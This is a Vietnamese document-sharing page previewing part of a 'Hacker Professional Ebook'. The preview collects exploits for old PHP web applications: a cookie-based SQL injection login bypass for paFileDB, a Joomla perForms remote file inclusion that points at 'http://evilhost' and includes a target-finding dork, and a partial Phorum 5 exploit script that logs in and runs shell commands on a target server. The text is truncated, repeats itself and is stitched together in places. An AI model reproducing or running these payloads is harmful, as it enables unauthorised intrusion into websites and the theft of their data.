1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 403 pdf

11 80 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 11
Dung lượng 35,72 KB

Nội dung

# greetz : www.cigicigi.net & redhackers Vulnerable; include/admin/auth.php c0de ; if (isset($_COOKIE['pafiledb_user']) && isset($_COOKIE['pafiledb_pass'])) { //If the cookie exists, do all this: $admininfo = array(); if (checkpass($_COOKIE['pafiledb_user'], $_COOKIE['pafiledb_pass'], $admininfo)) { //checkpass() returned true, so the user exists //$adminloggedin is a var used throughout the script to see if someone's logged in. $adminloggedin = true; $smarty->assign('admininfo', $admininfo[0]); } else { //The cookie exists, but the user/pass don't match username : 1%20union%20select%%20201,2,3,4/* password : 1%20union%20select%%20201,2,3,4/* / pafile/pafiledb.php?action=admin logged Black_hat_cr(HCE) perForms <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion Jul perForms <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion Remote : Yes Critical Level : High Vuln founded in a log file: lazy 0day!!! Description: ~~~~~~~~~~~~ Application : perForms Joomla Component Version : latest version [1.0] URL : http://forge.joomla.org/sf/projects/performs Variable $mosConfig_absolute_path not sanitized: xpl works with register_globals=on in /components/com_performs/com_performs/performs.php on lines 6-10 require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib _template.php" ); require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib _valid.php" ); require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib _phpForm.php" ); require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/myL ib.php" ); require_once($mosConfig_absolute_path."/administrator/components/com_per forms/class.performs.php"); Exploit: ~~~~~~~~ dork: inurl:"com_performs" -> founds ~12.000 sites (!) http://www.vuln.com/components/com_p osConfig_absol ute_path=http://evilhost Fix ~~~~ Add before code: defined('_VALID_MOS') or die('Direct access to this location is not allowed.'); Thx ~~~~ Who works for better code and better life! vns3curity(HCE) PHORUM 5 arbitrary local inclusion #!/usr/bin/php -q -d short_open_tag=on <? echo "PHORUM 5 arbitrary local inclusion exploit\n"; echo "by rgod rgod (at) autistici (dot) org [email concealed]\n"; echo "site: http://retrogod.altervista.org\n"; echo "dork: \"This forum powered by Phorum.\"\n\n"; /* works with: register_globals=On magic_quotes_gpc=Off */ if ($argc<6) { echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\n"; echo "host: target server (ip/hostname)\n"; echo "path: path to phorum\n"; echo "user/pass: you need a valid user account\n"; echo "cmd: a shell command\n"; echo "Options:\n"; echo " -p[port]: specify a port other than 80\n"; echo " -P[ip:port]: specify a proxy\n"; echo "Examples:\n"; echo "php ".$argv[0]." a.b.c.d /phorum/ username password ls -la\n"; echo "php ".$argv[0]." a.b.c.d / username password ls -la -P1.1.1.1:8080\n"; echo "php ".$argv[0]." a.b.c.d / username password cat ./include/db/config.php - p81\n"; die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b) '; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy ';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy \r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy ';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "\r\n".$html; } $host=$argv[1]; $path=$argv[2]; $user=$argv[3]; $pass=$argv[4]; $cmd=""; $port=80; $proxy=""; for ($i=5; $i<=$argc-1; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} echo "[1] Login \r\n"; $data="forum_id=0"; $data.="&redir=http%3A%2F%2F".$host."%2Findex.php" ; $data.="&username=".$user; $data.="&password=".$pass; $packet ="POST ".$p."login.php HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Accept: text/plain\r\n"; $packet.="Connection: Close\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Cookie: phorum_tmp_cookie=this+will+be+destroyed+once+logg . ';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy "; $ock=fsockopen($parts[0],$parts[1]); if. # greetz : www.cigicigi.net & redhackers Vulnerable; include/admin/auth.php c0de ; if (isset($_COOKIE['pafiledb_user'])

Ngày đăng: 04/07/2014, 12:20